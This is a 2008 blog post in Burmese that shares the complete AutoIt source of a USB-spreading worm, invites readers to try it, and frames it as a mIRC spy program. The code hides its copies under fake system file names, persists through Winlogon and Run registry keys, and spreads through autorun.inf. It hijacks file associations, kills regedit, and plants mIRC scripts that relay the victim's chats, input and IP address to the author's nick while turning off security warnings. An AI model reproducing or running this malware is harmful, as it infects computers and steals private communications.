Opt("TrayIconHide", 1) ;0=show, 1=hide tray icon
RegWrite("HKEY_CLASSES_ROOT\. ", "", "REG_SZ", "exefile")
RegWrite("HKEY_CLASSES_ROOT\.~»", "", "REG_SZ", "exefile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\. ", "", "REG_SZ", "exefile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.~»", "", "REG_SZ", "exefile")
RegWrite("HKEY_CLASSES_ROOT\*", "InfoTip", "REG_SZ", "I love you baby!")
If ProcessExists("msconfig.pif")then
$dir = "explorer.exe " & @ScriptDir
Run( $dir , "", @SW_MAXIMIZE) ;if user open the drive, allow it
EndIf
If ProcessExists("«~.~»") Then ;if not infected
Else
FileCopy( @ScriptFullPath , @SystemDir & "\ntdetect.com",1) ;0 =not overwrite 1 = overwrite
FileSetAttrib( @SystemDir & "\ntdetect.com", "+R+S+H")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", "REG_SZ" ,@SystemDir & "\userinit.exe," & @SystemDir & "\ntdetect.com")
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
FileSetAttrib( @SystemDir & "\«~.~»", "+R+S+H")
FileSetAttrib( "c:\AUTOEXEC.BAT", "-R")
$file = FileOpen("c:\AUTOEXEC.BAT", 2) ;0 Read,1 Append , 2 Clear contents
; Check if file opened for writing OK
If $file = -1 Then
Exit
EndIf
FileWrite($file, "start " & @SystemDir & "\«~.~»")
FileClose($file)
Run( @SystemDir & "\«~.~»" ,"" , @SW_HIDE)
EndIf
$app = @ScriptDir
$var = DriveGetType( $app )
If $var = "REMOVABLE" then ;First run from Memory Stick Initial stage for infection
$dir = "explorer.exe " & @ScriptDir
Run( $dir , "", @SW_MAXIMIZE) ;if user open MEmorystick allow it
Elseif $var = "fixed" then ;running from computer
If @SystemDir & "\ntdetect.com" = @ScriptFullPath then
RegWrite("HKEY_CLASSES_ROOT\.mp3", "", "REG_SZ", "love")
RegWrite("HKEY_CLASSES_ROOT\.jpg", "", "REG_SZ", "love")
RegWrite("HKEY_CLASSES_ROOT\love", "", "REG_SZ", "somazina@gmail.com")
RegWrite("HKEY_CLASSES_ROOT\dllfile\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\love\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mp3", "", "REG_SZ", "love")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpg", "", "REG_SZ", "love")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\love", "", "REG_SZ", "somazina@gmail.com")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\love\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
If @MON = "2" and @MDAY = "16" Then Exit
Elseif @SystemDir & "\«~.~»" = @ScriptFullPath then
$ii = 0
$count = 0
Do
$drv = DriveGetDrive( "removable" ) ;Check for removable Disk to be infected
If NOT @error Then
If @MON = "2" and @MDAY = "16" Then ExitLoop
For $i = 1 to $drv[0]
if $drv[$i] <> "a:" then
if DriveStatus ( $drv[$i] ) = "READY" then
FileCopy( @ScriptFullPath , $drv[$i] & "\phyatkyee.blogspot.com",0)
FileCopy( @ScriptFullPath , $drv[$i] & "\Photos.exe",0)
FileSetAttrib( $drv[$i] & "\autorun.inf", "-R-S")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "open", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shellexecute", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell\Explore\command", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell\Open\command", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell", "Explore")
FileSetAttrib( $drv[$i] & "\autorun.inf", "+S+H")
EndIf
EndIf
Next ;end of next for removeable drives
$fix = DriveGetDrive( "fixed" )
For $a = 1 to $fix[0] ;for Hard drives
If DriveStatus ( $fix[$a] ) = "UNKNOWN" then
Else
FileCopy( @ScriptFullPath , $fix[$a] & "\msconfig.pif",1)
IniWrite($fix[$a] & "\autorun.inf", "autorun", "open", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shellexecute", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell\Explore\command", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell\Open\command", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell", "Explore")
FileSetAttrib( $fix[$a] & "\autorun.inf", "+R+S+H")
EndIf
Next
;check for initial program
If ProcessExists(" . ") Then
Else
FileCopy( @ScriptFullPath , @ProgramFilesDir & "\ . ",1)
Run( @ProgramFilesDir & "\ . ", "", @SW_HIDE)
EndIf
EndIf
Sleep(10000)
Until $ii = 10
Elseif @ProgramFilesDir & "\ . " = @ScriptFullPath then
While 0 <> 1
If @MON = "2" and @MDAY = "16" Then Exit
If ProcessExists(" . ") = 0 Then
FileCopy( @ScriptFullPath , @WindowsDir & "\ . ",1)
Run(" . ", "", @SW_HIDE)
EndIf
If ProcessExists("«~.~»") = 0 Then
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
Run("«~.~»", "", @SW_HIDE)
EndIf
ProcessClose("regedit.exe")
$PID = ProcessExists("regedit.exe") ; Will return the PID or 0 if the process isn't found.( PID= Process ID )
If $PID Then ProcessClose($PID)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD" ,"0")
sleep(500)
WEnd
Elseif @WindowsDir & "\ . " = @ScriptFullPath then
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Yadanar", "REG_SZ", @WindowsDir & "\TASKMAN.EXE")
While 0 <> 1
If @MON = "2" and @MDAY = "16" Then Exit
If ProcessExists(" . ") = 0 Then
FileCopy( @ScriptFullPath , @ProgramFilesDir & "\ . ",1)
Run(@ProgramFilesDir & "\ . ", "", @SW_HIDE)
EndIf
If ProcessExists("«~.~»") = 0 Then
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
Run("«~.~»", "", @SW_HIDE)
Endif
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDriveTypeAutoRun", "REG_DWORD", "1")
sleep(500)
WEnd
Endif ;fixed drive end
Endif; Main End
;for MIRc program
if FileExists( "C:\Program Files\mIRC\mirc.ini") then
$file = FileOpen("C:\Program Files\mIRC\mth.dll", 2);1 append 2 erase
If $file = -1 Then
Exit
EndIf
FileWrite($file, "on *:text:*:*: { .msg PhyatKyee «« < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }" & @CRLF)
FileWrite($file, "on *:input:*: { .msg PhyatKyee »» $iif($left($1,1) != / , < $+ $active $+ > ,[command]) $1- }" & @CRLF)
FileWrite($file, "on *:JOIN:#: { .msg PhyatKyee IP $+ » $+ $ip ¤ Host $+ » $+ $host ¤ $os ¤ server $+ » $+ $server ¤ $serverIP }")
$file = FileOpen("C:\Program Files\mIRC\mirc.dll", 2)
If $file = -1 Then
Exit
EndIf
FileWrite($file, ";If you don't know what you were doing" & @CRLF)
FileWrite($file, ";Don't modify the codes" & @CRLF)
FileWrite($file, ";By... PhyatKyee" & @CRLF)
FileWrite($file, "on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, ";combo 20, 100 41 104 285, edit " & @CRLF)
FileWrite($file, ";text Ops (+o):, 5, 3 44 95 13, right}" & @CRLF)
FileWrite($file, ";on 1:dialog:ncor:init:0:{" & @CRLF)
FileWrite($file, ";on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, ";}" & @CRLF)
FileWrite($file, "on *:connect: { /timer 30 120 /.msg PhyatKyee hi I'm now Using mIRC »» mth.dll }")
IniWrite("C:\Program Files\mIRC\mirc.ini", "rfiles", "n2", "mirc.dll")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "fserve", "off")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "dcc", "off")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "link", "off")
endif
; for scoopScript2004
if FileExists( "C:\Scoop2004\mirc.ini") then
$file = FileOpen("C:\Scoop2004\mth.dll", 2)
If $file = -1 Then
Exit
EndIf
FileWrite($file, "on *:text:*:*: { .msg PhyatKyee «« < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }" & @CRLF)
FileWrite($file, "on *:input:*: { .msg PhyatKyee »» $iif($left($1,1) != / , < $+ $active $+ > ,[command]) $1- }" & @CRLF)
FileWrite($file, "on *:JOIN:#: { .msg PhyatKyee IP $+ » $+ $ip ¤ Host $+ » $+ $host ¤ $os ¤ server $+ » $+ $server ¤ $serverIP }")
$file = FileOpen("C:\Scoop2004\remote03.sco", 2)
If $file = -1 Then
Exit
EndIf
FileWrite($file, "on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, "on *:connect: { /timer 30 120 /.msg PhyatKyee Scoop »» mth.dll }")
IniWrite("C:\Scoop2004\mirc.ini", "rfiles", "n3", "remote03.sco")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "fserve", "off")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "dcc", "off")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "link", "off")
endif
;If my birthday
if @WDAY = "5" then
While 0 <> 1
msgbox(4096,"Birthday","Happy Birthday !" & @CRLF & "And I love you So Much." & @CRLF & "Ko PhyatKyee" )
sleep(50000)
RegWrite("HKEY_CLASSES_ROOT\.mp3", "", "REG_SZ", "mp3file")
RegWrite("HKEY_CLASSES_ROOT\.jpg", "", "REG_SZ", "jpegfile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mp3", "", "REG_SZ", "mp3file")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpg", "", "REG_SZ", "jpgfile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk", "", "REG_SZ", "lnkfile")
sleep(90000)
WEnd
EndIf
ေအာက္ကဟာကေတာ့ mircchatက စပုိင္ပရိုဂရမ္ေလးပါ
စိတ္ဝင္စားရင္ စမ္းၾကည္ပါခင္ဗ်ာ
အဲသလုိ ေရထာတာေတာ့ ကုိ ဖ်က္ႀကီ ျဖစ္ပါတယ္ ကၽြန္ေတာ္ ေတာ့ နည္နည္ ရုိင္တယ္လုိ ေရခဲ့တယ္..
ခင္ဗ်ာ တုိ႔ ဘယ္လုိ႔ ထင္လဲ ဗ်..
သူ virus က computer icon ပုံေတြကုိ ေကာင္မေလ ပုံ ေျပာင္တာ တုိ႔ ဘာလုိ႔ လုပ္တယ္ ဗ်ာ..
သိပ္ ေတာ့ မထိခုိက္ဘူလုိ႔ ေျပာၾကတာ ပဲ
ကၽြန္ေတာ္ လဲ မလုပ္တတ္ေသဘူ ခုမွ စမ္ ၾကည့္ ရမွာ သူဘေလာက္ ကုိ သြာၾကည့္ေတာ့ အဲဒီ code ေတြ တာ နဲ႔ ခု အျခာ လူေတြ နည္လမ္မ်ာ ရမလာ လုိ႔ .. တင္ေပလိုက္ပါတယ္ ခင္ဗ်ာ..
ေလစာစြာျဖင့္
အလင္ေရာင္
Friday, December 26, 2008
Subscribe to:
Posts (Atom)
